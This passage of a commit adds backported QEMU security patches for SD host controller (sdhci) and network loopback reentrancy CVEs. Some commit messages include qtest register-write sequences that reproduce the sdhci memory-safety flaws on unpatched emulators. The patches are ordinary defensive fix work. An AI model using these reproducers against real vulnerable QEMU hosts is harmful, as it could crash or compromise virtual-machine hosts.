40Reported-by: Sergej Schumilo (Ruhr-Universität Bochum)
41Reported-by: Simon Wörner (Ruhr-Universität Bochum)
42Buglink: https://bugs.launchpad.net/qemu/+bug/1892960
43Buglink: https://bugs.launchpad.net/qemu/+bug/1909418
44Buglink: https://bugzilla.redhat.com/show_bug.cgi?id=1928146
45Acked-by: Alistair Francis <alistair.francis@wdc.com>
46Tested-by: Alexander Bulekov <alxndr@bu.edu>
47Tested-by: Philippe Mathieu-Daudé <f4bug@amsat.org>
48Signed-off-by: Bin Meng <bmeng.cn@gmail.com>
49Message-Id: <20210303122639.20004-2-bmeng.cn@gmail.com>
50Signed-off-by: Philippe Mathieu-Daudé <f4bug@amsat.org>
51
52CVE: CVE-2021-3409 CVE-2020-17380
53Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/qemu/tree/debian/patches/CVE-2021-3409-1.patch?h=ubuntu/focal-security Upstream commit https://github.com/qemu/qemu/commit/b263d8f928001b5cfa2a993ea43b7a5b3a1811e8 ]
54Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
55---
56 hw/sd/sdhci.c | 4 +++-
57 1 file changed, 3 insertions(+), 1 deletion(-)
58
59--- a/hw/sd/sdhci.c
60+++ b/hw/sd/sdhci.c
61@@ -316,6 +316,7 @@ static void sdhci_send_command(SDHCIStat
62 SDRequest request;
63 uint8_t response[16];
64 int rlen;
65+ bool timeout = false;
66
67 s->errintsts = 0;
68 s->acmd12errsts = 0;
69@@ -339,6 +340,7 @@ static void sdhci_send_command(SDHCIStat
70 trace_sdhci_response16(s->rspreg[3], s->rspreg[2],
71 s->rspreg[1], s->rspreg[0]);
72 } else {
73+ timeout = true;
74 trace_sdhci_error("timeout waiting for command response");
75 if (s->errintstsen & SDHC_EISEN_CMDTIMEOUT) {
76 s->errintsts |= SDHC_EIS_CMDTIMEOUT;
77@@ -359,7 +361,7 @@ static void sdhci_send_command(SDHCIStat
78
79 sdhci_update_irq(s);
80
81- if (s->blksize && (s->cmdreg & SDHC_CMD_DATA_PRESENT)) {
82+ if (!timeout && s->blksize && (s->cmdreg & SDHC_CMD_DATA_PRESENT)) {
83 s->data_count = 0;
84 sdhci_data_transfer(s);
85 }
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-3409-2.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-3409-2.patch
new file mode 100644
index 0000000000..dc00f76ec9
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3409-2.patch
@@ -0,0 +1,103 @@
1From 8be45cc947832b3c02144c9d52921f499f2d77fe Mon Sep 17 00:00:00 2001
2From: Bin Meng <bmeng.cn@gmail.com>
3Date: Wed, 3 Mar 2021 20:26:36 +0800
4Subject: [PATCH] hw/sd: sdhci: Don't write to SDHC_SYSAD register when
5 transfer is in progress
6MIME-Version: 1.0
7Content-Type: text/plain; charset=utf8
8Content-Transfer-Encoding: 8bit
9
10Per "SD Host Controller Standard Specification Version 7.00"
11chapter 2.2.1 SDMA System Address Register:
12
13This register can be accessed only if no transaction is executing
14(i.e., after a transaction has stopped).
15
16With this fix, the following reproducer:
17
18outl 0xcf8 0x80001010
19outl 0xcfc 0xfbefff00
20outl 0xcf8 0x80001001
21outl 0xcfc 0x06000000
22write 0xfbefff2c 0x1 0x05
23write 0xfbefff0f 0x1 0x37
24write 0xfbefff0a 0x1 0x01
25write 0xfbefff0f 0x1 0x29
26write 0xfbefff0f 0x1 0x02
27write 0xfbefff0f 0x1 0x03
28write 0xfbefff04 0x1 0x01
29write 0xfbefff05 0x1 0x01
30write 0xfbefff07 0x1 0x02
31write 0xfbefff0c 0x1 0x33
32write 0xfbefff0e 0x1 0x20
33write 0xfbefff0f 0x1 0x00
34write 0xfbefff2a 0x1 0x01
35write 0xfbefff0c 0x1 0x00
36write 0xfbefff03 0x1 0x00
37write 0xfbefff05 0x1 0x00
38write 0xfbefff2a 0x1 0x02
39write 0xfbefff0c 0x1 0x32
40write 0xfbefff01 0x1 0x01
41write 0xfbefff02 0x1 0x01
42write 0xfbefff03 0x1 0x01
43
44cannot be reproduced with the following QEMU command line:
45
46$ qemu-system-x86_64 -nographic -machine accel=qtest -m 512M \
47 -nodefaults -device sdhci-pci,sd-spec-version=3 \
48 -drive if=sd,index=0,file=null-co://,format=raw,id=mydrive \
49 -device sd-card,drive=mydrive -qtest stdio
50
51Cc: qemu-stable@nongnu.org
52Fixes: CVE-2020-17380
53Fixes: CVE-2020-25085
54Fixes: CVE-2021-3409
55Fixes: d7dfca0807a0 ("hw/sdhci: introduce standard SD host controller")
56Reported-by: Alexander Bulekov <alxndr@bu.edu>
57Reported-by: Cornelius Aschermann (Ruhr-Universität Bochum)
58Reported-by: Sergej Schumilo (Ruhr-Universität Bochum)
59Reported-by: Simon Wörner (Ruhr-Universität Bochum)
60Buglink: https://bugs.launchpad.net/qemu/+bug/1892960
61Buglink: https://bugs.launchpad.net/qemu/+bug/1909418
62Buglink: https://bugzilla.redhat.com/show_bug.cgi?id=1928146
63Tested-by: Alexander Bulekov <alxndr@bu.edu>
64Signed-off-by: Bin Meng <bmeng.cn@gmail.com>
65Message-Id: <20210303122639.20004-3-bmeng.cn@gmail.com>
66Signed-off-by: Philippe Mathieu-Daudé <f4bug@amsat.org>
67
68CVE: CVE-2021-3409 CVE-2020-17380
69Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/qemu/tree/debian/patches/CVE-2021-3409-2.patch?h=ubuntu/focal-security Upstream commit https://github.com/qemu/qemu/commit/8be45cc947832b3c02144c9d52921f499f2d77fe ]
70Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
71---
72 hw/sd/sdhci.c | 20 +++++++++++---------
73 1 file changed, 11 insertions(+), 9 deletions(-)
74
75--- a/hw/sd/sdhci.c
76+++ b/hw/sd/sdhci.c
77@@ -1117,15 +1117,17 @@ sdhci_write(void *opaque, hwaddr offset,
78
79 switch (offset & ~0x3) {
80 case SDHC_SYSAD:
81- s->sdmasysad = (s->sdmasysad & mask) | value;
82- MASKED_WRITE(s->sdmasysad, mask, value);
83- /* Writing to last byte of sdmasysad might trigger transfer */
84- if (!(mask & 0xFF000000) && TRANSFERRING_DATA(s->prnsts) && s->blkcnt &&
85- s->blksize && SDHC_DMA_TYPE(s->hostctl1) == SDHC_CTRL_SDMA) {
86- if (s->trnmod & SDHC_TRNS_MULTI) {
87- sdhci_sdma_transfer_multi_blocks(s);
88- } else {
89- sdhci_sdma_transfer_single_block(s);
90+ if (!TRANSFERRING_DATA(s->prnsts)) {
91+ s->sdmasysad = (s->sdmasysad & mask) | value;
92+ MASKED_WRITE(s->sdmasysad, mask, value);
93+ /* Writing to last byte of sdmasysad might trigger transfer */
94+ if (!(mask & 0xFF000000) && s->blkcnt && s->blksize &&
95+ SDHC_DMA_TYPE(s->hostctl1) == SDHC_CTRL_SDMA) {
96+ if (s->trnmod & SDHC_TRNS_MULTI) {
97+ sdhci_sdma_transfer_multi_blocks(s);
98+ } else {
99+ sdhci_sdma_transfer_single_block(s);
100+ }
101 }
102 }
103 break;
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-3409-3.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-3409-3.patch
new file mode 100644
index 0000000000..d06ac0ed3c
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3409-3.patch
@@ -0,0 +1,71 @@
1Backport of:
2
3From bc6f28995ff88f5d82c38afcfd65406f0ae375aa Mon Sep 17 00:00:00 2001
4From: Bin Meng <bmeng.cn@gmail.com>
5Date: Wed, 3 Mar 2021 20:26:37 +0800
6Subject: [PATCH] hw/sd: sdhci: Correctly set the controller status for ADMA
7MIME-Version: 1.0
8Content-Type: text/plain; charset=utf8
9Content-Transfer-Encoding: 8bit
10
11When an ADMA transfer is started, the codes forget to set the
12controller status to indicate a transfer is in progress.
13
14With this fix, the following 2 reproducers:
15
16https://paste.debian.net/plain/1185136
17https://paste.debian.net/plain/1185141
18
19cannot be reproduced with the following QEMU command line:
20
21$ qemu-system-x86_64 -nographic -machine accel=qtest -m 512M \
22 -nodefaults -device sdhci-pci,sd-spec-version=3 \
23 -drive if=sd,index=0,file=null-co://,format=raw,id=mydrive \
24 -device sd-card,drive=mydrive -qtest stdio
25
26Cc: qemu-stable@nongnu.org
27Fixes: CVE-2020-17380
28Fixes: CVE-2020-25085
29Fixes: CVE-2021-3409
30Fixes: d7dfca0807a0 ("hw/sdhci: introduce standard SD host controller")
31Reported-by: Alexander Bulekov <alxndr@bu.edu>
32Reported-by: Cornelius Aschermann (Ruhr-Universität Bochum)
33Reported-by: Sergej Schumilo (Ruhr-Universität Bochum)
34Reported-by: Simon Wörner (Ruhr-Universität Bochum)
35Buglink: https://bugs.launchpad.net/qemu/+bug/1892960
36Buglink: https://bugs.launchpad.net/qemu/+bug/1909418
37Buglink: https://bugzilla.redhat.com/show_bug.cgi?id=1928146
38Tested-by: Alexander Bulekov <alxndr@bu.edu>
39Reviewed-by: Philippe Mathieu-Daudé <f4bug@amsat.org>
40Signed-off-by: Bin Meng <bmeng.cn@gmail.com>
41Message-Id: <20210303122639.20004-4-bmeng.cn@gmail.com>
42Signed-off-by: Philippe Mathieu-Daudé <f4bug@amsat.org>
43
44CVE: CVE-2021-3409 CVE-2020-17380
45Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/qemu/tree/debian/patches/CVE-2021-3409-3.patch?h=ubuntu/focal-security Upstream commit https://github.com/qemu/qemu/commit/bc6f28995ff88f5d82c38afcfd65406f0ae375aa ]
46Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
47---
48 hw/sd/sdhci.c | 3 +++
49 1 file changed, 3 insertions(+)
50
51--- a/hw/sd/sdhci.c
52+++ b/hw/sd/sdhci.c
53@@ -776,8 +776,9 @@ static void sdhci_do_adma(SDHCIState *s)
54
55 switch (dscr.attr & SDHC_ADMA_ATTR_ACT_MASK) {
56 case SDHC_ADMA_ATTR_ACT_TRAN: /* data transfer */
57-
58+ s->prnsts |= SDHC_DATA_INHIBIT | SDHC_DAT_LINE_ACTIVE;
59 if (s->trnmod & SDHC_TRNS_READ) {
60+ s->prnsts |= SDHC_DOING_READ;
61 while (length) {
62 if (s->data_count == 0) {
63 for (n = 0; n < block_size; n++) {
64@@ -807,6 +808,7 @@ static void sdhci_do_adma(SDHCIState *s)
65 }
66 }
67 } else {
68+ s->prnsts |= SDHC_DOING_WRITE;
69 while (length) {
70 begin = s->data_count;
71 if ((length + begin) < block_size) {
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-3409-4.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-3409-4.patch
new file mode 100644
index 0000000000..2e49e3bc18
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3409-4.patch
@@ -0,0 +1,52 @@
1Backport of:
2
3From 5cd7aa3451b76bb19c0f6adc2b931f091e5d7fcd Mon Sep 17 00:00:00 2001
4From: Bin Meng <bmeng.cn@gmail.com>
5Date: Wed, 3 Mar 2021 20:26:38 +0800
6Subject: [PATCH] hw/sd: sdhci: Limit block size only when SDHC_BLKSIZE
7 register is writable
8MIME-Version: 1.0
9Content-Type: text/plain; charset=utf8
10Content-Transfer-Encoding: 8bit
11
12The codes to limit the maximum block size is only necessary when
13SDHC_BLKSIZE register is writable.
14
15Tested-by: Alexander Bulekov <alxndr@bu.edu>
16Reviewed-by: Philippe Mathieu-Daudé <f4bug@amsat.org>
17Signed-off-by: Bin Meng <bmeng.cn@gmail.com>
18Message-Id: <20210303122639.20004-5-bmeng.cn@gmail.com>
19Signed-off-by: Philippe Mathieu-Daudé <f4bug@amsat.org>
20
21CVE: CVE-2021-3409 CVE-2020-17380
22Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/qemu/tree/debian/patches/CVE-2021-3409-4.patch?h=ubuntu/focal-security Upstream commit https://github.com/qemu/qemu/commit/5cd7aa3451b76bb19c0f6adc2b931f091e5d7fcd ]
23Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
24---
25 hw/sd/sdhci.c | 14 +++++++-------
26 1 file changed, 7 insertions(+), 7 deletions(-)
27
28--- a/hw/sd/sdhci.c
29+++ b/hw/sd/sdhci.c
30@@ -1137,15 +1137,15 @@ sdhci_write(void *opaque, hwaddr offset,
31 if (!TRANSFERRING_DATA(s->prnsts)) {
32 MASKED_WRITE(s->blksize, mask, extract32(value, 0, 12));
33 MASKED_WRITE(s->blkcnt, mask >> 16, value >> 16);
34- }
35
36- /* Limit block size to the maximum buffer size */
37- if (extract32(s->blksize, 0, 12) > s->buf_maxsz) {
38- qemu_log_mask(LOG_GUEST_ERROR, "%s: Size 0x%x is larger than " \
39- "the maximum buffer 0x%x", __func__, s->blksize,
40- s->buf_maxsz);
41+ /* Limit block size to the maximum buffer size */
42+ if (extract32(s->blksize, 0, 12) > s->buf_maxsz) {
43+ qemu_log_mask(LOG_GUEST_ERROR, "%s: Size 0x%x is larger than "
44+ "the maximum buffer 0x%x\n", __func__, s->blksize,
45+ s->buf_maxsz);
46
47- s->blksize = deposit32(s->blksize, 0, 12, s->buf_maxsz);
48+ s->blksize = deposit32(s->blksize, 0, 12, s->buf_maxsz);
49+ }
50 }
51
52 break;
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-3409-5.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-3409-5.patch
new file mode 100644
index 0000000000..7b436809e9
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3409-5.patch
@@ -0,0 +1,93 @@
1From cffb446e8fd19a14e1634c7a3a8b07be3f01d5c9 Mon Sep 17 00:00:00 2001
2From: Bin Meng <bmeng.cn@gmail.com>
3Date: Wed, 3 Mar 2021 20:26:39 +0800
4Subject: [PATCH] hw/sd: sdhci: Reset the data pointer of s->fifo_buffer[] when
5 a different block size is programmed
6MIME-Version: 1.0
7Content-Type: text/plain; charset=utf8
8Content-Transfer-Encoding: 8bit
9
10If the block size is programmed to a different value from the
11previous one, reset the data pointer of s->fifo_buffer[] so that
12s->fifo_buffer[] can be filled in using the new block size in
13the next transfer.
14
15With this fix, the following reproducer:
16
17outl 0xcf8 0x80001010
18outl 0xcfc 0xe0000000
19outl 0xcf8 0x80001001
20outl 0xcfc 0x06000000
21write 0xe000002c 0x1 0x05
22write 0xe0000005 0x1 0x02
23write 0xe0000007 0x1 0x01
24write 0xe0000028 0x1 0x10
25write 0x0 0x1 0x23
26write 0x2 0x1 0x08
27write 0xe000000c 0x1 0x01
28write 0xe000000e 0x1 0x20
29write 0xe000000f 0x1 0x00
30write 0xe000000c 0x1 0x32
31write 0xe0000004 0x2 0x0200
32write 0xe0000028 0x1 0x00
33write 0xe0000003 0x1 0x40
34
35cannot be reproduced with the following QEMU command line:
36
37$ qemu-system-x86_64 -nographic -machine accel=qtest -m 512M \
38 -nodefaults -device sdhci-pci,sd-spec-version=3 \
39 -drive if=sd,index=0,file=null-co://,format=raw,id=mydrive \
40 -device sd-card,drive=mydrive -qtest stdio
41
42Cc: qemu-stable@nongnu.org
43Fixes: CVE-2020-17380
44Fixes: CVE-2020-25085
45Fixes: CVE-2021-3409
46Fixes: d7dfca0807a0 ("hw/sdhci: introduce standard SD host controller")
47Reported-by: Alexander Bulekov <alxndr@bu.edu>
48Reported-by: Cornelius Aschermann (Ruhr-Universität Bochum)
49Reported-by: Sergej Schumilo (Ruhr-Universität Bochum)
50Reported-by: Simon Wörner (Ruhr-Universität Bochum)
51Buglink: https://bugs.launchpad.net/qemu/+bug/1892960
52Buglink: https://bugs.launchpad.net/qemu/+bug/1909418
53Buglink: https://bugzilla.redhat.com/show_bug.cgi?id=1928146
54Tested-by: Alexander Bulekov <alxndr@bu.edu>
55Signed-off-by: Bin Meng <bmeng.cn@gmail.com>
56Message-Id: <20210303122639.20004-6-bmeng.cn@gmail.com>
57Signed-off-by: Philippe Mathieu-Daudé <f4bug@amsat.org>
58
59CVE: CVE-2021-3409 CVE-2020-17380
60Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/qemu/tree/debian/patches/CVE-2021-3409-5.patch?h=ubuntu/focal-security Upstream commit https://github.com/qemu/qemu/commit/cffb446e8fd19a14e1634c7a3a8b07be3f01d5c9 ]
61Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
62---
63 hw/sd/sdhci.c | 12 ++++++++++++
64 1 file changed, 12 insertions(+)
65
66--- a/hw/sd/sdhci.c
67+++ b/hw/sd/sdhci.c
68@@ -1135,6 +1135,8 @@ sdhci_write(void *opaque, hwaddr offset,
69 break;
70 case SDHC_BLKSIZE:
71 if (!TRANSFERRING_DATA(s->prnsts)) {
72+ uint16_t blksize = s->blksize;
73+
74 MASKED_WRITE(s->blksize, mask, extract32(value, 0, 12));
75 MASKED_WRITE(s->blkcnt, mask >> 16, value >> 16);
76
77@@ -1146,6 +1148,16 @@ sdhci_write(void *opaque, hwaddr offset,
78
79 s->blksize = deposit32(s->blksize, 0, 12, s->buf_maxsz);
80 }
81+
82+ /*
83+ * If the block size is programmed to a different value from
84+ * the previous one, reset the data pointer of s->fifo_buffer[]
85+ * so that s->fifo_buffer[] can be filled in using the new block
86+ * size in the next transfer.
87+ */
88+ if (blksize != s->blksize) {
89+ s->data_count = 0;
90+ }
91 }
92
93 break;
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_1.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_1.patch
new file mode 100644
index 0000000000..5bacd67481
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_1.patch
@@ -0,0 +1,177 @@
1From 4b1988a29d67277d6c8ce1df52975f5616592913 Mon Sep 17 00:00:00 2001
2From: Jason Wang <jasowang@redhat.com>
3Date: Wed, 24 Feb 2021 11:44:36 +0800
4Subject: [PATCH 01/10] net: introduce qemu_receive_packet()
5MIME-Version: 1.0
6Content-Type: text/plain; charset=UTF-8
7Content-Transfer-Encoding: 8bit
8
9Some NIC supports loopback mode and this is done by calling
10nc->info->receive() directly which in fact suppresses the effort of
11reentrancy check that is done in qemu_net_queue_send().
12
13Unfortunately we can't use qemu_net_queue_send() here since for
14loopback there's no sender as peer, so this patch introduce a
15qemu_receive_packet() which is used for implementing loopback mode
16for a NIC with this check.
17
18NIC that supports loopback mode will be converted to this helper.
19
20This is intended to address CVE-2021-3416.
21
22Cc: Prasad J Pandit <ppandit@redhat.com>
23Reviewed-by: Philippe Mathieu-Daudé <philmd@redhat.com>
24Cc: qemu-stable@nongnu.org
25Signed-off-by: Jason Wang <jasowang@redhat.com>
26
27Upstream-Status: Backport [705df5466c98f3efdd2b68d3b31dad86858acad7]
28CVE: CVE-2021-3416
29
30Signed-off-by: Sakib Sajal <sakib.sajal@windriver.com>
31---
32 include/net/net.h | 5 +++++
33 include/net/queue.h | 8 ++++++++
34 net/net.c | 38 +++++++++++++++++++++++++++++++-------
35 net/queue.c | 22 ++++++++++++++++++++++
36 4 files changed, 66 insertions(+), 7 deletions(-)
37
38diff --git a/include/net/net.h b/include/net/net.h
39index 778fc787c..03f058ecb 100644
40--- a/include/net/net.h
41+++ b/include/net/net.h
42@@ -143,12 +143,17 @@ void *qemu_get_nic_opaque(NetClientState *nc);
43 void qemu_del_net_client(NetClientState *nc);
44 typedef void (*qemu_nic_foreach)(NICState *nic, void *opaque);
45 void qemu_foreach_nic(qemu_nic_foreach func, void *opaque);
46+int qemu_can_receive_packet(NetClientState *nc);
47 int qemu_can_send_packet(NetClientState *nc);
48 ssize_t qemu_sendv_packet(NetClientState *nc, const struct iovec *iov,
49 int iovcnt);
50 ssize_t qemu_sendv_packet_async(NetClientState *nc, const struct iovec *iov,
51 int iovcnt, NetPacketSent *sent_cb);
52 ssize_t qemu_send_packet(NetClientState *nc, const uint8_t *buf, int size);
53+ssize_t qemu_receive_packet(NetClientState *nc, const uint8_t *buf, int size);
54+ssize_t qemu_receive_packet_iov(NetClientState *nc,
55+ const struct iovec *iov,
56+ int iovcnt);
57 ssize_t qemu_send_packet_raw(NetClientState *nc, const uint8_t *buf, int size);
58 ssize_t qemu_send_packet_async(NetClientState *nc, const uint8_t *buf,
59 int size, NetPacketSent *sent_cb);
60diff --git a/include/net/queue.h b/include/net/queue.h
61index c0269bb1d..9f2f289d7 100644
62--- a/include/net/queue.h
63+++ b/include/net/queue.h
64@@ -55,6 +55,14 @@ void qemu_net_queue_append_iov(NetQueue *queue,
65
66 void qemu_del_net_queue(NetQueue *queue);
67
68+ssize_t qemu_net_queue_receive(NetQueue *queue,
69+ const uint8_t *data,
70+ size_t size);
71+
72+ssize_t qemu_net_queue_receive_iov(NetQueue *queue,
73+ const struct iovec *iov,
74+ int iovcnt);
75+
76 ssize_t qemu_net_queue_send(NetQueue *queue,
77 NetClientState *sender,
78 unsigned flags,
79diff --git a/net/net.c b/net/net.c
80index 6a2c3d956..5e15e5d27 100644
81--- a/net/net.c
82+++ b/net/net.c
83@@ -528,6 +528,17 @@ int qemu_set_vnet_be(NetClientState *nc, bool is_be)
84 #endif
85 }
86
87+int qemu_can_receive_packet(NetClientState *nc)
88+{
89+ if (nc->receive_disabled) {
90+ return 0;
91+ } else if (nc->info->can_receive &&
92+ !nc->info->can_receive(nc)) {
93+ return 0;
94+ }
95+ return 1;
96+}
97+
98 int qemu_can_send_packet(NetClientState *sender)
99 {
100 int vm_running = runstate_is_running();
101@@ -540,13 +551,7 @@ int qemu_can_send_packet(NetClientState *sender)
102 return 1;
103 }
104
105- if (sender->peer->receive_disabled) {
106- return 0;
107- } else if (sender->peer->info->can_receive &&
108- !sender->peer->info->can_receive(sender->peer)) {
109- return 0;
110- }
111- return 1;
112+ return qemu_can_receive_packet(sender->peer);
113 }
114
115 static ssize_t filter_receive_iov(NetClientState *nc,
116@@ -679,6 +684,25 @@ ssize_t qemu_send_packet(NetClientState *nc, const uint8_t *buf, int size)
117 return qemu_send_packet_async(nc, buf, size, NULL);
118 }
119
120+ssize_t qemu_receive_packet(NetClientState *nc, const uint8_t *buf, int size)
121+{
122+ if (!qemu_can_receive_packet(nc)) {
123+ return 0;
124+ }
125+
126+ return qemu_net_queue_receive(nc->incoming_queue, buf, size);
127+}
128+
129+ssize_t qemu_receive_packet_iov(NetClientState *nc, const struct iovec *iov,
130+ int iovcnt)
131+{
132+ if (!qemu_can_receive_packet(nc)) {
133+ return 0;
134+ }
135+
136+ return qemu_net_queue_receive_iov(nc->incoming_queue, iov, iovcnt);
137+}
138+
139 ssize_t qemu_send_packet_raw(NetClientState *nc, const uint8_t *buf, int size)
140 {
141 return qemu_send_packet_async_with_flags(nc, QEMU_NET_PACKET_FLAG_RAW,
142diff --git a/net/queue.c b/net/queue.c
143index 19e32c80f..c872d51df 100644
144--- a/net/queue.c
145+++ b/net/queue.c
146@@ -182,6 +182,28 @@ static ssize_t qemu_net_queue_deliver_iov(NetQueue *queue,
147 return ret;
148 }
149
150+ssize_t qemu_net_queue_receive(NetQueue *queue,
151+ const uint8_t *data,
152+ size_t size)
153+{
154+ if (queue->delivering) {
155+ return 0;
156+ }
157+
158+ return qemu_net_queue_deliver(queue, NULL, 0, data, size);
159+}
160+
161+ssize_t qemu_net_queue_receive_iov(NetQueue *queue,
162+ const struct iovec *iov,
163+ int iovcnt)
164+{
165+ if (queue->delivering) {
166+ return 0;
167+ }
168+
169+ return qemu_net_queue_deliver_iov(queue, NULL, 0, iov, iovcnt);
170+}
171+
172 ssize_t qemu_net_queue_send(NetQueue *queue,
173 NetClientState *sender,
174 unsigned flags,
175--
1762.29.2
177
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_10.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_10.patch
new file mode 100644
index 0000000000..fdb4894e44
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_10.patch
@@ -0,0 +1,41 @@
1From 65b851efd3d0280425c202f4e5880c48f8334dae Mon Sep 17 00:00:00 2001
2From: Alexander Bulekov <alxndr@bu.edu>
3Date: Mon, 1 Mar 2021 14:35:30 -0500
4Subject: [PATCH 10/10] lan9118: switch to use qemu_receive_packet() for
5 loopback
6MIME-Version: 1.0
7Content-Type: text/plain; charset=UTF-8
8Content-Transfer-Encoding: 8bit
9
10This patch switches to use qemu_receive_packet() which can detect
11reentrancy and return early.
12
13This is intended to address CVE-2021-3416.
14
15Cc: Prasad J Pandit <ppandit@redhat.com>
16Cc: qemu-stable@nongnu.org
17Reviewed-by: Philippe Mathieu-Daudé <philmd@redhat.com
18Signed-off-by: Alexander Bulekov <alxndr@bu.edu>
19Signed-off-by: Jason Wang <jasowang@redhat.com>
20
21Upstream-Status: Backport [37cee01784ff0df13e5209517e1b3594a5e792d1]
22CVE: CVE-2021-3416
23
24Signed-off-by: Sakib Sajal <sakib.sajal@windriver.com>
25---
26 hw/net/lan9118.c | 2 +-
27 1 file changed, 1 insertion(+), 1 deletion(-)
28
29Index: qemu-4.2.0/hw/net/lan9118.c
30===================================================================
31--- qemu-4.2.0.orig/hw/net/lan9118.c
32+++ qemu-4.2.0/hw/net/lan9118.c
33@@ -667,7 +667,7 @@ static void do_tx_packet(lan9118_state *
34 /* FIXME: Honor TX disable, and allow queueing of packets. */
35 if (s->phy_control & 0x4000) {
36 /* This assumes the receive routine doesn't touch the VLANClient. */
37- lan9118_receive(qemu_get_queue(s->nic), s->txp->data, s->txp->len);
38+ qemu_receive_packet(qemu_get_queue(s->nic), s->txp->data, s->txp->len);
39 } else {
40 qemu_send_packet(qemu_get_queue(s->nic), s->txp->data, s->txp->len);
41 }
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_2.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_2.patch
new file mode 100644
index 0000000000..5e53e20bac
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_2.patch
@@ -0,0 +1,42 @@
1From e2a48a3c7cc33dbbe89f896e0f07462cb04ff6b5 Mon Sep 17 00:00:00 2001
2From: Jason Wang <jasowang@redhat.com>
3Date: Wed, 24 Feb 2021 12:13:22 +0800
4Subject: [PATCH 02/10] e1000: switch to use qemu_receive_packet() for loopback
5MIME-Version: 1.0
6Content-Type: text/plain; charset=UTF-8
7Content-Transfer-Encoding: 8bit
8
9This patch switches to use qemu_receive_packet() which can detect
10reentrancy and return early.
11
12This is intended to address CVE-2021-3416.
13
14Cc: Prasad J Pandit <ppandit@redhat.com>
15Cc: qemu-stable@nongnu.org
16Reviewed-by: Philippe Mathieu-Daudé <philmd@redhat.com>
17Signed-off-by: Jason Wang <jasowang@redhat.com>
18
19Upstream-Status: Backport [1caff0340f49c93d535c6558a5138d20d475315c]
20CVE: CVE-2021-3416
21
22Signed-off-by: Sakib Sajal <sakib.sajal@windriver.com>
23---
24 hw/net/e1000.c | 2 +-
25 1 file changed, 1 insertion(+), 1 deletion(-)
26
27diff --git a/hw/net/e1000.c b/hw/net/e1000.c
28index d7d05ae30..cf22c4f07 100644
29--- a/hw/net/e1000.c
30+++ b/hw/net/e1000.c
31@@ -546,7 +546,7 @@ e1000_send_packet(E1000State *s, const uint8_t *buf, int size)
32
33 NetClientState *nc = qemu_get_queue(s->nic);
34 if (s->phy_reg[PHY_CTRL] & MII_CR_LOOPBACK) {
35- nc->info->receive(nc, buf, size);
36+ qemu_receive_packet(nc, buf, size);
37 } else {
38 qemu_send_packet(nc, buf, size);
39 }
40--
412.29.2
42
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_3.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_3.patch
new file mode 100644
index 0000000000..3fc469e3e3
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_3.patch
@@ -0,0 +1,43 @@
1From c041a4da1ff119715e0ccf2d4a7af62568f17b93 Mon Sep 17 00:00:00 2001
2From: Jason Wang <jasowang@redhat.com>
3Date: Wed, 24 Feb 2021 12:57:40 +0800
4Subject: [PATCH 03/10] dp8393x: switch to use qemu_receive_packet() for
5 loopback packet
6MIME-Version: 1.0
7Content-Type: text/plain; charset=UTF-8
8Content-Transfer-Encoding: 8bit
9
10This patch switches to use qemu_receive_packet() which can detect
11reentrancy and return early.
12
13This is intended to address CVE-2021-3416.
14
15Cc: Prasad J Pandit <ppandit@redhat.com>
16Cc: qemu-stable@nongnu.org
17Reviewed-by: Philippe Mathieu-Daudé <philmd@redhat.com
18Signed-off-by: Jason Wang <jasowang@redhat.com>
19
20Upstream-Status: Backport [331d2ac9ea307c990dc86e6493e8f0c48d14bb33]
21CVE: CVE-2021-3416
22
23Signed-off-by: Sakib Sajal <sakib.sajal@windriver.com>
24---
25 hw/net/dp8393x.c | 2 +-
26 1 file changed, 1 insertion(+), 1 deletion(-)
27
28diff --git a/hw/net/dp8393x.c b/hw/net/dp8393x.c
29index 205c0decc..533a8304d 100644
30--- a/hw/net/dp8393x.c
31+++ b/hw/net/dp8393x.c
32@@ -506,7 +506,7 @@ static void dp8393x_do_transmit_packets(dp8393xState *s)
33 s->regs[SONIC_TCR] |= SONIC_TCR_CRSL;
34 if (nc->info->can_receive(nc)) {
35 s->loopback_packet = 1;
36- nc->info->receive(nc, s->tx_buffer, tx_len);
37+ qemu_receive_packet(nc, s->tx_buffer, tx_len);
38 }
39 } else {
40 /* Transmit packet */
41--
422.29.2
43
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_5.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_5.patch
new file mode 100644
index 0000000000..93202ebcef
--- /dev/null
